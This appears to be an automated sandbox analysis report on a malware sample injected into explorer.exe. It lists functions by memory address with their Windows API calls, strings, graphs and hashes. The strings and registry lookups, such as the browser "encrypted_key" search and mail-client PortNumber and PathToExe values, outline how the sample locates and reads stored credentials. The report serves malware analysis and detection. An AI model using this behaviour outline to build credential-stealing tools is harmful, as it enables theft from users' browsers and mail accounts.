                                                                                                                                                                                                              control_flow_graph 782 279a67c-279a692 783 279a6c1-279a6c4 782->783 784 279a694-279a6bf _alldiv _allmul 782->784 785 279a6c7-279a6d2 call 279a33b 783->785 784->785 788 279a6f0-279a6fb SetEndOfFile 785->788 789 279a6d4-279a6df 785->789 791 279a6fd-279a708 788->791 792 279a71e 788->792 790 279a6e4-279a6ee call 279a1c6 789->790 793 279a722-279a726 790->793 791->792 799 279a70a-279a71c 791->799 792->793 796 279a728-279a72b 793->796 797 279a73a-279a740 793->797 796->797 800 279a72d 796->800 799->790 801 279a72f-279a732 800->801 802 279a734-279a737 800->802 801->797 801->802 802->797
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File_alldiv_allmul
                                                                                                                                                                                                              • String ID: winTruncate1$winTruncate2
                                                                                                                                                                                                              • API String ID: 3568847005-470713972
                                                                                                                                                                                                              • Opcode ID: deaa25b86bb1daf32dc1937fdd54f45e424d0572a83b2b8f62de4329138e695e
                                                                                                                                                                                                              • Instruction ID: b18bed81b732b9dbbc0be99c21506f633725282855ec8d248627a15c5b3153f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: deaa25b86bb1daf32dc1937fdd54f45e424d0572a83b2b8f62de4329138e695e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D621DE72602301ABDF548E29EC95E6777BAEF88314F418129FD05DB244DB32D810CBB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02794AA2
                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02794AC7
                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02794AD4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                                                                                              • String ID: %s\%08x$Software
                                                                                                                                                                                                              • API String ID: 1800864259-1658101971
                                                                                                                                                                                                              • Opcode ID: defbb8e8ffa97543f16e80983c4ecb061a982e67e293d192716fff05da043e86
                                                                                                                                                                                                              • Instruction ID: 86ad52e048ab97366a27f6b4407c8bdeaea9f6b87183a0a68b7311f15a63be8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: defbb8e8ffa97543f16e80983c4ecb061a982e67e293d192716fff05da043e86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2101D471A40108FFEF189B54DC49DBF7BADEB45254B40016EF506A3100E6715E519675
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _alloca_probe.NTDLL ref: 0279431C
                                                                                                                                                                                                              • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02794335
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02794363
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 027943C8
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                                • Part of subcall function 0279418A: wsprintfW.USER32 ref: 02794212
                                                                                                                                                                                                                • Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
                                                                                                                                                                                                                • Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 027943B9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 801677237-0
                                                                                                                                                                                                              • Opcode ID: 43e8b9d917d21c6cef62baacba516ff0c4a542dc331714bed193fe440b6f7882
                                                                                                                                                                                                              • Instruction ID: 1354f8e4200c65378b8270f5388676448b51b582cf3a7809e615ce017be754f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43e8b9d917d21c6cef62baacba516ff0c4a542dc331714bed193fe440b6f7882
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 801163B1504301BFEB159B20DC48DBF77EDEB88314F00492DB849D2100EB749D559A72
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.NTDLL ref: 0279B8D5
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0279B96F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFilememset
                                                                                                                                                                                                              • String ID: psow$winOpen
                                                                                                                                                                                                              • API String ID: 2416746761-4101858489
                                                                                                                                                                                                              • Opcode ID: 46363d8f7065039edd2880bd359941809c80e8b05a8fb3c8a294eed5f39f511e
                                                                                                                                                                                                              • Instruction ID: 866529563740e454aaa933f1a58127d78e0020f92d2e696334c4a709ffc20108
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46363d8f7065039edd2880bd359941809c80e8b05a8fb3c8a294eed5f39f511e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9717D71A047019FDB11DF24E885B1ABBE5FF88728F005A2DF864A7290D774D914CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98
                                                                                                                                                                                                                • Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
                                                                                                                                                                                                                • Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 217796345-0
                                                                                                                                                                                                              • Opcode ID: 52595400901fc9d97eba10ddf491ae564e40a64e9ec7c9cebaf2f81502916f86
                                                                                                                                                                                                              • Instruction ID: 5f0eada8842d93dbf7d3fee487dafb304147665a42dd2edfc902b17f6d7dd29f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52595400901fc9d97eba10ddf491ae564e40a64e9ec7c9cebaf2f81502916f86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F421A172605342AFEF258A21ED08F7BB7EDEBC8758F444A2DF98996150E731CD208671
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyW.ADVAPI32(?,?,?), ref: 02791ED5
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791F0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02791F98
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791F82
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1077800024-0
                                                                                                                                                                                                              • Opcode ID: 1cae7a76352ee02d27a4a5557801f176db68fd2d05809c2ee657070f48e01d6e
                                                                                                                                                                                                              • Instruction ID: 5bef6a0480a949af610d87dfd7d7896cf38ede478b3a156c35d87bfd32dfa08c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cae7a76352ee02d27a4a5557801f176db68fd2d05809c2ee657070f48e01d6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F721A171608306AFDB059B24EC48E3F7BEEEF88358F40892CF49A92100DB75C924DB21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02793E1E,00000000,?,02793FA8), ref: 02791C46
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,02793FA8), ref: 02791C56
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,02793FA8), ref: 02791C91
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02793FA8), ref: 02791C76
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2517252058-0
                                                                                                                                                                                                              • Opcode ID: 325f8066150943d56e5b53d715a3d496fb3faf66301a7efdb6da920a14d47587
                                                                                                                                                                                                              • Instruction ID: 709cb13c20b662f1890184fc2df3af4dffc1b5057e3db445ca18f765feee723b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325f8066150943d56e5b53d715a3d496fb3faf66301a7efdb6da920a14d47587
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F02832201318BBCA205A29EC8CE7B7B5CDB476F9F120718F40A961C0EB2358219171
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02793E30,00000000,00000000,?,02793FA8), ref: 02792FC1
                                                                                                                                                                                                              • lstrlen.KERNEL32("encrypted_key":",?,02793FA8), ref: 02792FCE
                                                                                                                                                                                                              • StrStrIA.SHLWAPI("encrypted_key":",027E692C,?,02793FA8), ref: 02792FDD
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,?), ref: 02791946
                                                                                                                                                                                                                • Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,00000000), ref: 0279194A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                                                                              • String ID: "encrypted_key":"
                                                                                                                                                                                                              • API String ID: 493641738-877455259
                                                                                                                                                                                                              • Opcode ID: 0ab49c25eca727154daf3a5867006123417c1b58ea4439fe8e8c0547ff1ad0bf
                                                                                                                                                                                                              • Instruction ID: 569615ded785605ed30a3e384fc5ade0a2c339947d4b7be6166a6ac7a19ccb7a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ab49c25eca727154daf3a5867006123417c1b58ea4439fe8e8c0547ff1ad0bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAE02B32E45764AF9F227BB53C449873F1D9E2B0243054074F50287103DF618405C2B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0279BB40
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID: winDelete
                                                                                                                                                                                                              • API String ID: 3188754299-3936022152
                                                                                                                                                                                                              • Opcode ID: 414e79733dcae027e90b5f177f8a762799340b4de3070bf3fd9224f816ebadd0
                                                                                                                                                                                                              • Instruction ID: 4494cbfb6e3a86aed71ac5b68acbca1db28c3eb5fd85fc2d4700758aa77d088c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 414e79733dcae027e90b5f177f8a762799340b4de3070bf3fd9224f816ebadd0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D911C431A04308EBDF11EB79B885D7D777ADB81768F105569E906E72C8DB308901DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
                                                                                                                                                                                                                • Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02792EE4
                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02792F54
                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02792F62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1066184869-0
                                                                                                                                                                                                              • Opcode ID: f60a0999367eb26ff7cee05bf4ebd618879ec507dae36a895ee7403b622f6514
                                                                                                                                                                                                              • Instruction ID: cdbd7546e93463e218e0bf8a26616d752b6f34f63c6c7120c5ec073eb79a86e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f60a0999367eb26ff7cee05bf4ebd618879ec507dae36a895ee7403b622f6514
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42016731204351AB8F15AF25EC08D7F7BAEEFC9354F00481DF85996140DB368965DFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175140541-0
                                                                                                                                                                                                              • Opcode ID: 68cc94d092f484cb7ea88a5f5f1e0ab145eba61156cee6375e850599d43d59b9
                                                                                                                                                                                                              • Instruction ID: a597b61c2054de03d6e4591524edcc9744a72bf4668e4ede4aafa72340894ea2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68cc94d092f484cb7ea88a5f5f1e0ab145eba61156cee6375e850599d43d59b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4C04C35A84200CBEE812BE06C1D70A355DAB18B12F008804E209CD080EB7040118B36
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02799FF8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0279A00E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                              • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                                                                              • API String ID: 10892065-982776804
                                                                                                                                                                                                              • Opcode ID: b2b1849a4b3648b129fcd8c31d3a9d11a1c67015676fcaca3338fa4e8abd3f0a
                                                                                                                                                                                                              • Instruction ID: a71cb9d5138c94590c3b168f7d2b4dc1f17d95b27ecf798acd456c0b8f9b29d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2b1849a4b3648b129fcd8c31d3a9d11a1c67015676fcaca3338fa4e8abd3f0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0F6B3A48341FAFF301959BC88F27A79DD789785F504819FE4A96240F371AC018630
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02792E83,PathToExe,00000000,00000000), ref: 02791B16
                                                                                                                                                                                                                • Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
                                                                                                                                                                                                                • Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02791B40
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                              • API String ID: 2162223993-2036018995
                                                                                                                                                                                                              • Opcode ID: e92d5c36ef7092bc1d91517947ecc14f7d7d39ccedcfc2204819f3422b3b214e
                                                                                                                                                                                                              • Instruction ID: 0f69008cb4c0d68d2add6e582bd3c4172359e0e089628c80bbcda2f2cb8693c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e92d5c36ef7092bc1d91517947ecc14f7d7d39ccedcfc2204819f3422b3b214e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF0593274074957EE12692EEC88E3B374FCBC22F67834029F41EA7201EE23AC215274
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0279A35F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID: winSeekFile
                                                                                                                                                                                                              • API String ID: 973152223-3168307952
                                                                                                                                                                                                              • Opcode ID: c637f443e826e0129a45e6d823f67d9d5a35dd5ef5c5ce5b1c12ddf52b313e93
                                                                                                                                                                                                              • Instruction ID: 5ac1800e5faa2eb9e306ff26cbc505634b9f430f8b8a665cd7c6d68247fa2dd4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c637f443e826e0129a45e6d823f67d9d5a35dd5ef5c5ce5b1c12ddf52b313e93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFF02430A15304EFEB119F24EC009BB77AAEB84320F10C769F926CA2C0DB30DD109AA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(04D10000,00000000,?), ref: 02799EB5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02799ECD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                                                                              • API String ID: 1279760036-667713680
                                                                                                                                                                                                              • Opcode ID: 2891f40aea7878cf5c3a6080f8b5f71c25fceb8679da0829b84aaa7abaecd0f2
                                                                                                                                                                                                              • Instruction ID: 7564f6a6dd7e7945c56a9623d7914c4cb2be6a90b07e40b0d2a7988cad57484e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2891f40aea7878cf5c3a6080f8b5f71c25fceb8679da0829b84aaa7abaecd0f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE0C2B3A88310BBDA122684BC04F2FBB6ADB95F10F058415FB05A6200C230982187B6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(04D10000,00000000,?), ref: 02799EF8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • failed to HeapFree block %p (%lu), heap=%p, xrefs: 02799F0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                                                                              • API String ID: 3298025750-4030396798
                                                                                                                                                                                                              • Opcode ID: c965d2db26614a733b23529880203b32ac3ffa031950388c344f584a6f1f6d52
                                                                                                                                                                                                              • Instruction ID: 1815284ca70f804139743cb761f63fc19c4fc1729b3cf34d1c616c00bd833d54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c965d2db26614a733b23529880203b32ac3ffa031950388c344f584a6f1f6d52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31D0C2B354C300F7EA116A50AC05F2BBB3A9B86B00F44480CF30555015C3705061AB35
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
